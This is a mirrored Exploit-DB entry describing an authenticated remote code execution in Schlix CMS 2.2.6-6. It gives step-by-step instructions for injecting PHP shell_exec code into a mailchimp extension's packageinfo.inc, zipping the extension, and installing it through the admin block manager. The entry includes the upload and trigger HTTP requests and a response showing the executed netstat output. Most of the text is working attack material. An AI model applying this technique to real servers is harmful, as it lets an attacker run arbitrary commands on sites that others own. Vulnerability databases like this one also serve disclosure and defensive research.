bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/49838.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

295 lines
No EOL
14 KiB
Text
Raw Blame History

# Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
# Date: 2021-05-06
# Exploit Author: Eren Saraç
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer
==> Tutorial <==
1- Login with your account.
2- Go to the block management section. Directory is '/admin/app/core.blockmanager'.
3- Create a new category.
4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp
5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory.
6- Paste this PHP code below and save it.
#####################################
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
#####################################
7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'.
8- Install a package to created category and enter the installed 'mailchimp' extension.
9- Click the 'About' tab and our php code will be executed.
==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <==
<?php
$name = 'mailchimp';
$type = 'block';
$guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
$version = '1.0';
$license = 'MIT';
$description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers. It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.';
$author = 'Alip';
$url = 'https://github.com/calip/app_mailchimp';
$email = 'asalip.putra@gmail.com';
$copyright = 'Copyright &copy;2019 calip';
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
==> HTTP Request (ZIP Extension Installation) <==
POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Schlix-Ajax: 1
Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130
Content-Length: 51585
Origin: http(s)://(ORIGIN)
Connection: close
Referer: http(s)://(REFERER)/admin/app/core.blockmanager
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2;
schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="_csrftoken"
a3b9a0da8d6be08513f60d1744e2642df0702ff7
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip"
Content-Type: application/x-zip-compressed
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__total_file_size"
0
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__max_file_count"
20
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="password"
# Your ACC Password.
-----------------------------29322337091578227221515354130--
==> HTTP Request (RCE - About Tab) <==
GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http(s)://(HOST)/
Connection: close
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2;
schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1
==> HTTP Response (RCE - About Tab) <==
HTTP/1.1 200 OK
Date: Wed, 05 May 2021 21:49:24 GMT
Server: Apache/2.4.46 (Win64) PHP/7.3.21
X-Powered-By: PHP/7.3.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49575
<!DOCTYPE html>
<html>
<body>
<div id="tab_options" class="schlixui-childtab">
<pre>
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:902 0.0.0.0:0 LISTENING
TCP 0.0.0.0:912 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3307 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING
TCP 0.0.0.0:50296 0.0.0.0:0 LISTENING
TCP 127.0.0.1:80 127.0.0.1:58843 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58853 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58854 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58859 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58860 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58865 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58868 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58883 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58893 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58894 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58899 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58902 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58908 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58918 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58919 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58924 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58886 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58887 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58888 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58891 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58905 CLOSE_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58907 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58911 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58913 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58915 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58916 TIME_WAIT
TCP 127.0.0.1:58424 127.0.0.1:58425 ESTABLISHED
TCP 127.0.0.1:58425 127.0.0.1:58424 ESTABLISHED
TCP 127.0.0.1:58435 127.0.0.1:58436 ESTABLISHED
TCP 127.0.0.1:58436 127.0.0.1:58435 ESTABLISHED
TCP 127.0.0.1:58565 127.0.0.1:58566 ESTABLISHED
TCP 127.0.0.1:58566 127.0.0.1:58565 ESTABLISHED
TCP 127.0.0.1:58639 127.0.0.1:58640 ESTABLISHED
TCP 127.0.0.1:58640 127.0.0.1:58639 ESTABLISHED
TCP 169.254.22.167:139 0.0.0.0:0 LISTENING
TCP 169.254.224.26:139 0.0.0.0:0 LISTENING
TCP 192.168.1.8:139 0.0.0.0:0 LISTENING
TCP 192.168.1.8:49500 95.101.14.77:443 ESTABLISHED
TCP 192.168.1.8:57059 162.159.129.235:443 ESTABLISHED
TCP 192.168.1.8:57902 162.159.138.234:443 ESTABLISHED
TCP 192.168.1.8:58453 44.235.189.138:443 ESTABLISHED
TCP 192.168.1.8:58626 162.159.138.232:443 ESTABLISHED
TCP 192.168.1.8:58627 162.159.133.234:443 ESTABLISHED
TCP 192.168.1.8:58699 162.159.135.232:443 ESTABLISHED
TCP 192.168.1.8:58841 20.44.232.74:443 ESTABLISHED
TCP 192.168.1.8:58942 162.159.138.232:443 ESTABLISHED
TCP 192.168.1.8:58951 138.68.92.190:443 ESTABLISHED
TCP 192.168.1.8:60549 51.103.5.159:443 ESTABLISHED
TCP 192.168.1.8:60610 104.66.70.197:443 ESTABLISHED
TCP 192.168.1.8:60611 104.66.70.197:443 ESTABLISHED
TCP 192.168.1.8:60612 217.31.233.104:443 CLOSE_WAIT
TCP [::]:80 [::]:0 LISTENING
TCP [::]:135 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:3306 [::]:0 LISTENING
TCP [::]:3307 [::]:0 LISTENING
TCP [::]:7680 [::]:0 LISTENING
TCP [::]:49664 [::]:0 LISTENING
TCP [::]:49665 [::]:0 LISTENING
TCP [::]:49666 [::]:0 LISTENING
TCP [::]:49667 [::]:0 LISTENING
TCP [::]:49668 [::]:0 LISTENING
TCP [::]:50296 [::]:0 LISTENING
TCP [::1]:3306 [::1]:58845 TIME_WAIT
TCP [::1]:3306 [::1]:58856 TIME_WAIT
TCP [::1]:3306 [::1]:58857 TIME_WAIT
TCP [::1]:3306 [::1]:58858 TIME_WAIT
TCP [::1]:3306 [::1]:58932 TIME_WAIT
TCP [::1]:3306 [::1]:58935 TIME_WAIT
TCP [::1]:3306 [::1]:58940 TIME_WAIT
TCP [::1]:3306 [::1]:58950 TIME_WAIT
TCP [::1]:3306 [::1]:58953 ESTABLISHED
TCP [::1]:3306 [::1]:58954 ESTABLISHED
TCP [::1]:49485 [::1]:49486 ESTABLISHED
TCP [::1]:49486 [::1]:49485 ESTABLISHED
TCP [::1]:49669 [::]:0 LISTENING
TCP [::1]:58844 [::1]:3306 TIME_WAIT
TCP [::1]:58845 [::1]:3306 TIME_WAIT
TCP [::1]:58855 [::1]:3306 TIME_WAIT
TCP [::1]:58856 [::1]:3306 TIME_WAIT
TCP [::1]:58857 [::1]:3306 TIME_WAIT
TCP [::1]:58858 [::1]:3306 TIME_WAIT
TCP [::1]:58861 [::1]:3306 TIME_WAIT
TCP [::1]:58862 [::1]:3306 TIME_WAIT
TCP [::1]:58863 [::1]:3306 TIME_WAIT
TCP [::1]:58864 [::1]:3306 TIME_WAIT
TCP [::1]:58866 [::1]:3306 TIME_WAIT
TCP [::1]:58867 [::1]:3306 TIME_WAIT
TCP [::1]:58869 [::1]:3306 TIME_WAIT
TCP [::1]:58870 [::1]:3306 TIME_WAIT
TCP [::1]:58884 [::1]:3306 TIME_WAIT
TCP [::1]:58885 [::1]:3306 TIME_WAIT
TCP [::1]:58929 [::1]:3306 TIME_WAIT
TCP [::1]:58930 [::1]:3306 TIME_WAIT
TCP [::1]:58931 [::1]:3306 TIME_WAIT
TCP [::1]:58932 [::1]:3306 TIME_WAIT
TCP [::1]:58934 [::1]:3306 TIME_WAIT
TCP [::1]:58935 [::1]:3306 TIME_WAIT
TCP [::1]:58939 [::1]:3306 TIME_WAIT
TCP [::1]:58940 [::1]:3306 TIME_WAIT
TCP [::1]:58946 [::1]:3306 TIME_WAIT
TCP [::1]:58947 [::1]:3306 TIME_WAIT
TCP [::1]:58949 [::1]:3306 TIME_WAIT
TCP [::1]:58950 [::1]:3306 TIME_WAIT
TCP [::1]:58953 [::1]:3306 ESTABLISHED
TCP [::1]:58954 [::1]:3306 ESTABLISHED
UDP 0.0.0.0:5050 *:*
UDP 0.0.0.0:5353 *:*
UDP 0.0.0.0:5355 *:*
UDP 0.0.0.0:53240 *:*
UDP 0.0.0.0:53241 *:*
UDP 127.0.0.1:1900 *:*
UDP 127.0.0.1:62353 *:*
UDP 127.0.0.1:63129 *:*
UDP 192.168.1.8:137 *:*
UDP 192.168.1.8:138 *:*
UDP 192.168.1.8:1900 *:*
UDP 192.168.1.8:2177 *:*
UDP 192.168.1.8:63128 *:*
UDP [::]:5353 *:*
UDP [::]:5355 *:*
UDP [::1]:1900 *:*
UDP [::1]:63125 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:1900 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:2177 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:63124 *:*
</pre>
<div class="content">
<div class="row">
<div class="col-xs-12">
<div class="text-center">
<h1>mailchimp</h1>
<p>v1.0</p><p>Author: <a href="mailto:asalip.putra@gmail.com">Alip</a></p>
<p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p>
<p><a href="/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p>
</div>
</div>
</div>
</div>
</div>
</body>
Reference in a new issue View git blame Copy permalink